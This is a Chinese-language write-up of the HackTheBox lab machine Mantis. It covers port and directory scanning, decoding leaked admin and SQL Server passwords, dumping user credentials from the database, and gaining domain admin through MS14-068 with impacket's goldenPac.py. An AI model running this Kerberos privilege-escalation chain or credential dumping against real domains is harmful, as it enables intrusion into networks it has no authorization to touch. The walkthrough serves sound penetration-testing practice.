Mantis - HackTheBox

基本信息

• https://www.hackthebox.eu/home/machines/profile/98

• 10.10.10.52

端口扫描

需要全端口扫描，用到的1337端口默认扫不到：

$ nmap -p- 10.10.10.52
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-18 13:39 CST
Nmap scan report for 10.10.10.52
Host is up (0.067s latency).
Not shown: 65508 closed ports
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
1337/tcp  open  waste
1433/tcp  open  ms-sql-s
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5722/tcp  open  msdfsr
8080/tcp  open  http-proxy
9389/tcp  open  adws
47001/tcp open  winrm
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  unknown
49158/tcp open  unknown
49164/tcp open  unknown
49165/tcp open  unknown
49168/tcp open  unknown
50255/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 903.78 seconds

8080

是一个Orchard Blog：

任意构造404能够得到login链接：

1337

直接访问是IIS默认页面：

目录扫描

1337端口目录扫描，得到一个目录：

gobuster dir -u http://10.10.10.52:1337 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
...
/secure_notes (Status: 301)
...

dev_notes

这个是OrchardCMS相关文档，里面有admin密码信息：

dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt

1. Download OrchardCMS
2. Download SQL server 2014 Express ,create user "admin",and create orcharddb database
3. Launch IIS and add new website and point to Orchard CMS folder location.
4. Launch browser and navigate to http://localhost:8080
5. Set admin password and configure sQL server connection string.
6. Add blog pages with admin user.

# 这里中间很多空行，页面最下面还有
Credentials stored in secure format
OrchardCMS admin creadentials 010000000110010001101101001000010110111001011111010100000100000001110011011100110101011100110000011100100110010000100001
SQL Server sa credentials file namez

blog admin password

上面得到的是密码的二进制形式，解码得到密码：

@dm!n_P@ssW0rd!

但这个管理界面没什么可利用的地方：

sql password

另外这个文件名base64 hex解码后得到的就是数据库密码,用户名是admin：

m$$ql_S@_P@ssW0rd!

orcharddb

然后连接数据库查看信息，得到用户名密码信息：

SELECT name FROM master.dbo.sysdatabases;
SELECT * FROM orcharddb.INFORMATION_SCHEMA.TABLES;
SELECT * FROM orcharddb.INFORMATION_SCHEMA.COLUMNS;
USE orcharddb;
SELECT * FROM blog_Orchard_Users_UserPartRecord;

james@htb.local james J@m3s_P@ssW0rd!

MS14-068

james用户账号密码可以rpc登录获取一些信息，但不能wmi,psexec之类的方式得到shell：

➜  Mantis rpcclient -U htb.local/james 10.10.10.52
Enter HTB.LOCAL\james's password:
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[james] rid:[0x44f]
rpcclient $> lookupnames james
james S-1-5-21-4220043660-4019079961-2895681657-1103 (User: 1)
rpcclient $>

搜索之后尝试ms14-068:

• （转）MS14-068域内提权漏洞总结 - 渗透测试中心 - 博客园
  https://www.cnblogs.com/backlion/p/6820744.html

goldenPac

需要加一下hosts：

10.10.10.52 htb.local mantis.htb.local

可以一步步来，也可以直接用impacket自带的goldenPac.py一键打：

python3 goldenPac.py htb.local/james:J@m3s_P@ssW0rd\!@mantis.htb.local

flags

然后直接去读取user.txt和root.txt:

type C:\Users\james\desktop\user.txt
type C:\Users\administrator\desktop\root.txt

参考资料

• （转）MS14-068域内提权漏洞总结 - 渗透测试中心 - 博客园
  https://www.cnblogs.com/backlion/p/6820744.html
• HTB: Mantis | 0xdf hacks stuff
  https://0xdf.gitlab.io/2020/09/03/htb-mantis.html
• https://www.hackthebox.eu/home/machines/writeup/98
• HackTheBox - Mantis - YouTube
  https://www.youtube.com/watch?v=VVZZgqIyD0Q&feature=youtu.be&ab_channel=IppSec